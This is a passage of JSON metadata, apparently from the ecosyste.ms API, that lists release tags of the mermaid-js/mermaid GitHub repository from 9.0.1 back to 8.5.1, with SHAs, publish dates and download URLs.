itHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/